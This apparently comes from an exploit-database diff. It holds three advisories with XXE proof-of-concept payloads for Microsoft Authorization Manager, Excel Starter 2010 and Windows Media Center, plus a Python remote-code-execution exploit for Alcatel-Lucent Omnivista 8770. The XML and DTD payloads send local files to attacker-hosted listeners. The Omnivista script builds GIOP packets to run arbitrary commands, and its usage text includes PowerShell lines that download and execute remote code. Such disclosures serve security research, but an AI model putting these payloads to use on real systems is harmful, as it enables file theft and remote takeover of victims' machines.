+        print("[+] Found %d appliance(s)"% count)
+
+        return
+
+ 
+if __name__ == "__main__":
+    main()

platforms/windows/local/40859.txt

@@ -0,0 +1,137 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-AZMAN-XXE-FILE-EXFILTRATION.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.microsoft.com
+
+
+
+Product:
+==============================
+Microsoft Authorization Manager
+v6.1.7601
+
+The Authorization Manager allows you to set role-based permissions for
+Authorization Manager-enabled applications.
+
+You can store authorization stores in either XML files, Active Directory
+Domain Services (AD DS), Active Directory Lightweight Directory
+Services (AD LDS), or in Microsoft SQL Server databases.
+
+
+
+Vulnerability Type:
+===================
+XML External Entity
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+"msxml3.dll" DLL is used by "Microsoft Management Console"  azman.msc  /
+eventvwr.msc and other Windows components to process XML files.
+
+The parser processes XML External Entity nodes allowing external
+connections to be made to remote malicious DTD documents that can
+potentially
+allow access to files on users system to be exfiltrated to a remote server.
+Therefore the XML parser is vulnerable to XXE attack if a user
+unknowingly opens a malicious XML 'authorization store' document via remote
+share/USB into 'Authorization Manager'.
+
+"C:\Windows\system32\mmc.exe"
+"C:\Windows\system32\azman.msc"
+"C:\Windows\System32\msxml3.dll"
+
+
+Exploit code(s):
+===============
+
+Start our listener on attacker server to access users files.
+python -m SimpleHTTPServer 8080
+
+
+Create the evil XML file with following payload to steal "system.ini" as
+data theft POC.
+
+<?xml version="1.0"?>
+<!DOCTYPE roottag [
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+
+Next, create the "payload.dtd" DTD document to host on attacker server.
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-server:8080?%file;'>">
+%all;
+
+
+
+1) Go to Windows CL and type azman to bring up Authorization Manager
+
+2) Go to Action / "Open Authorization store..."
+
+3) Select authorization store type to be 'XML file'
+
+4) Browse to open the "PWN.XML" authorization store file and click Ok
+
+
+User will see error message "Cannot open the authorization store. The
+following problem occurred: An attempt was made
+to load a program with an incorrect format."
+
+Result: files delivered to your server!
+
+
+
+
+Disclosure Timeline:
+===========================================
+Vendor Notification:  August 30, 2016
+Vendor Reply: August 30, 2016
+does not meet the bar for servicing as someone would have to
+obtain the XML from an untrusted source or compromised source"
+December 4, 2016 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Local / Remote
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx

platforms/windows/local/40860.txt

@@ -0,0 +1,151 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-STARTER-XXE-REMOTE-FILE-DISCLOSURE.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+=================
+www.microsoft.com
+
+
+
+Product:
+============================
+Microsoft Excel Starter 2010
+EXCELC.EXE  / "OFFICEVIRT.EXE"
+
+This is a bundled Excel "starter" version that comes 'pre-loaded' with some
+Windows systems running, this was tested on Windows 7 etc.
+
+"C:\Program Files (x86)\Common Files\microsoft shared\Virtualization
+Handler\CVH.EXE" "Microsoft Excel Starter 2010 9014006604090000"
+C:\PROGRA~2\COMMON~1\MICROS~1\VIRTUA~1
+
+Reference:
+https://support.office.com/en-us/article/Excel-features-that-are-not-fully-supported-in-Excel-Starter-0982b3f1-7bca-49a7-a04b-3c09d05941d4
+
+Microsoft Excel Starter 2010 is a simplified version of Excel that comes
+pre-loaded on your computer.
+Excel Starter includes features that are basic to creating and working with
+spreadsheets, but it does not include the rich set of features found
+in the full version of Excel.
+
+
+
+Vulnerability Type:
+====================
+XML External Entity
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+Microsoft Excel Starter OLD versions specifically ".xls" and ".xlthtml"
+files are vulnerable to XML External Entity attack. This can allow
+remote attackers to access and disclose ANY files from a victims computer
+if they open a corrupt ".xls" Excel file. We can also abuse XXE to
+make connections to the victims system/LAN and bypass Firewall,IPS etc
+(XXE/SSRF).
+
+Note: This has NOT worked in regular or updated patched Excel editions.
+
+When open the victim will get a warn message about it being a "different
+format and from trusted source".
+If user choose open the file they get error message "File cannot be opened
+because: System does not support the specified encoding."
+Then files you target get accessed and transfered to remote server.
+
+IF Excel version is "patched" or newer you will see message like "File
+cannot be opened because: Reference to undefined entity 'send' etc..."
+and XXE will fail.
+
+Tested successfully on several machines HP, TOSHIBA Windows 7 SP1 with
+Excel Starter 2010 versions. As some machines may still be running old
+pre-loaded Excel version it can be relevant so I release it anyways...
+
+
+
+Exploit code(s):
+===============
+
+POC to exfiltrate "system.ini" used by MS ADO Remote Data Services.
+
+
+Listen port 8080 (ATTACKER-SERVER)
+python -m SimpleHTTPServer 8080
+
+
+1) "payload.dtd" ( host on attacker server port 8080 same dir as our python web server )
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-SERVER:8080?%file;'>">
+%all;
+
+
+2) "PWN.xls"  Get vicitm to open it, ANY files belong to you!
+
+<?xml version="1.0"?>
+<!DOCTYPE APPARITION [
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://ATTACKER-SERVER:8080/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+
+
+Open the "PWN.xls" in Excel Starter 2010 then BOOM! ... its raining files!
+
+
+Video POC:
+https://vimeo.com/181891000
+
+
+
+Disclosure Timeline:
+=======================================
+Vendor Notification: September 4, 2016
+MSRC Response: "Out of date Office Client"
+December 4, 2016  : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+================
+High
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx

platforms/windows/local/40861.txt

@@ -0,0 +1,130 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================
+www.microsoft.com
+
+
+
+Product:
+==================================
+Windows Media Center "ehshell.exe"
+version 6.1.7600
+
+
+
+Vulnerability Type:
+====================
+XML External Entity
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Vulnerability Details:
+=====================
+
+Windows Media Center "ehshell.exe" is vulnerable to XML External Entity
+attack allowing remote access to ANY files on a victims computer, if they
+open
+an XXE laden ".mcl" file via a remote share / USB or from an malicious
+"windowsmediacenterweb" web link.
+
+Sometimes 'Windows Media Center' will crash, sometimes opens normally and
+other times will not open, but the files get accessed and exfiltrated.
+
+
+Tested Windows 7 SP1
+
+
+
+Exploit code(s):
+===============
+
+POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services.
+
+
+1) ATTACKER-IP listener
+python -m SimpleHTTPServer 8080
+
+
+
+2) Create the "FindMeThatBiotch.dtd" DTD file with below contents (host on
+ATTACKER-IP in directory where python server is listen)
+
+<!ENTITY % param666 "<!ENTITY &#x25; FindMeThatBiotch SYSTEM '
+http://ATTACKER-IP:8080/%data666;'>">
+
+
+
+3) Create the "EVIL.mcl" file.
+
+
+<?xml version="1.0"?>
+<!DOCTYPE hyp3rlinx [
+<!ENTITY % data666 SYSTEM "c:\Windows\msdfmap.ini">
+<!ENTITY % junk SYSTEM "http://ATTACKER-IP:8080/FindMeThatBiotch.dtd">
+%junk;
+%param666;
+%FindMeThatBiotch;
+]>
+
+
+
+4) Get victim to open the EVIL.mcl ... enjoy your files!
+
+OR create link on webpage to run the file, but "user has to consent first".
+
+<a href="windowsmediacenterweb://ATTACKER-IP:8080/EVIL.mcl">XXE POC</a>
+
+
+
+Disclosure Timeline:
+=======================================
+Vendor Notification:  September 1, 2016
+Vendor opens Case 34970: September 6, 2016
+Vendor reply "Wont Fix" : October 19, 2016
+December 4, 2016 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+================
+High
+
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx

platforms/windows/remote/40862.py

@@ -0,0 +1,241 @@
+import socket
+import time
+import sys
+import os
+
+# ref https://blog.malerisch.net/
+# Omnivista Alcatel-Lucent running on Windows Server
+
+
+if len(sys.argv) < 2:
+    print "Usage: %s <target> <command>" % sys.argv[0]
+    print "eg: %s 192.168.1.246 \"powershell.exe -nop -w hidden -c \$g=new-object net.webclient;IEX \$g.downloadstring('http://192.168.1.40:8080/hello');\"" % sys.argv[0]
+    sys.exit(1)
+
+target = sys.argv[1]
+argument1 = ' '.join(sys.argv[2:])
+
+# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...
+
+netbiosname = os.popen("nbtscan -s : "+target+" | cut -d ':' -f2").read()
+netbiosname = netbiosname.strip("\n")
+
+# dirty functions to do hex magic with bytes...
+### each variable has size byte before, which includes the string + "\x00" a NULL byte
+### needs to calculate for each
+### 
+
+def calcsize(giop):
+
+	s = len(giop.decode('hex'))
+	h = hex(s) #"\x04" -> "04"
+	return h[2:].zfill(8) # it's 4 bytes for the size
+
+def calcstring(param): # 1 byte size calc
+	
+	s = (len(param)/2)+1
+	h = hex(s)
+	return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...
+
+def calcstring2(param):
+
+	s = (len(param)/2)+1
+	h = hex(s)
+	return h[2:].zfill(4)
+
+
+
+##
+
+#GIOP request size is specified at the 11th byte
+
+# 0000   47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00  GIOP............
+# d8 is the size of GIOP REQUEST
+
+# GIOP HEADER Is 12 bytes -
+# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte
+
+
+
+#phase 1 - add a jobset
+
+giopid = 1 # an arbitrary ID can be put there...
+
+# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...
+
+usernamedata = "xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc".encode('hex') # original "383737302061646d696e697374726174696f6e2c6f3d6e6d63"
+
+#print "Size of usernamedata" + str(len(usernamedata.decode('hex')))
+
+jobname = "MYJOB01".encode('hex') # size of 7 bytes # check also in the captured packet...
+
+
+addjobset = "47494f50010000000000012600000000" + "00000001" + "01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008" + jobname + "00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d" + usernamedata + "00000000000a6f6d6e69766973626200" # this last part can be changed???
+
+print "Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch"
+print "Connecting to target..."
+
+
+
+
+p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+p.connect((target, 30024))
+
+
+#p = remote(target, 30024, "ipv4", "tcp")
+
+print "Adding a job..."
+
+p.send(addjobset.decode('hex'))
+
+#p.recv()
+
+data = p.recv(1024)
+
+s = len(data)
+
+#objectkey = "" # last 16 bytes of the response!
+
+objectkey = data[s-16:s].encode('hex')
+
+#print objectkey
+
+# phase 2 - active jobset
+
+print "Sending active packet against the job"
+
+activegiopid = 2
+active = "47494f50010000000000003100000000" + "00000002" + "0100000000000010" + objectkey +  "0000000741637469766500000000000000"
+
+#print active
+
+p.send(active.decode('hex'))
+
+data2 = p.recv(1024)
+
+#print data2
+
+# phase3 add task
+
+addjobid = 3
+
+print "Adding a task...."
+
+taskname = "BBBBBBB".encode('hex')
+servername = netbiosname.encode('hex')
+command = "C:\Windows\System32\cmd.exe".encode('hex') #on 32bit
+#command = "C:\Windows\SysWOW64\cmd.exe".encode('hex') #on 64bit
+commandsize = hex((len(command.decode('hex'))+1))
+commandsize = str(commandsize).replace("0x","")
+
+#print "Command size: "+ str(commandsize)
+
+#print command.decode('hex')
+
+#time.sleep(10)
+
+#powershell = str(command)
+#powershell = "powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');"
+
+#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
+
+#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
+
+argument = str("/c "+argument1).encode('hex')
+#argument = str("/c notepad.exe").encode('hex')
+
+#print len(argument.decode('hex'))
+
+#argumentsize = len(str("/c "+powershell))+1
+
+#print "Argument size: "+str(argumentsize)
+
+argumentsize = calcstring2(argument)
+
+#print "argument size: "+str(argumentsize)
+
+#print argument.decode('hex')
+
+def calcpadd(giop):
+	defaultpadding = "00000000000001"
+	check = giop + defaultpadding + fixedpadding
+	s = len(check)
+	#print "Size: "+str(s)
+	if (s/2) % 4 == 0:
+		#print "size ok!"
+		return check
+	else:
+		# fix the default padding
+		#print "Size not ok, recalculating padd..."
+		dif = (s/2) % 4
+		#print "diff: "+str(dif)
+		newpadding = defaultpadding[dif*2:]
+		#print "Newpadding: " +str(newpadding)
+		return giop + newpadding + fixedpadding
+
+
+
+
+addjobhdr = "47494f5001000000" # 8 bytes + 4 bytes for message size, including size of the giop request message
+
+fixedpadding = "000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000"
+
+variablepadding = "000000000001"
+
+#print calcstring(servername)
+#print calcstring(taskname)
+
+#print "Command:" +str(command)
+#print "command size:"+str(commandsize)
+
+addjob = "00000000000000b30100000000000010" + objectkey + "000000074164644a6f62000000000000000000" + calcstring(taskname) + taskname + "0000000001000000"+ commandsize + command  +"00000000" + calcstring(servername) + servername + "000000" + argumentsize + argument + "00"
+
+#print addjob
+
+addjobfin = calcpadd(addjob)
+
+#print addjobfin.decode('hex')
+
+addjobsize = calcsize(addjobfin)
+
+#print "Lenght of the addjob: "+str(len(addjobfin.decode('hex')))
+
+# we need to add the header
+
+finalmsg = addjobhdr + addjobsize + addjobfin
+
+
+p.send(finalmsg.decode('hex'))
+
+data3 = p.recv(1024)
+
+#print data3
+
+# phase4 - execute task
+
+executeid = 4
+
+print "Executing task..."
+
+execute = "47494f50010000000000003500000000000001100100000000000010" + objectkey + "0000000b457865637574654e6f7700000000000000"
+
+p.send(execute.decode('hex'))
+
+data4 = p.recv(1024)
+
+print "All packets sent..."
+print "Exploit sequence completed, command should have been executed...:-)"
+
+p.close()
+
+# optional requests to remove the job after the exploitation
+
+### in metasploit, we should migrate to another process and then call an "abort" function of Omnivista
+
+##phase5 - abort the job
+
+canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectkey + "0000000743616e63656c000000000000"
+
+###phase6 - delete the jobset 
+
+deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000"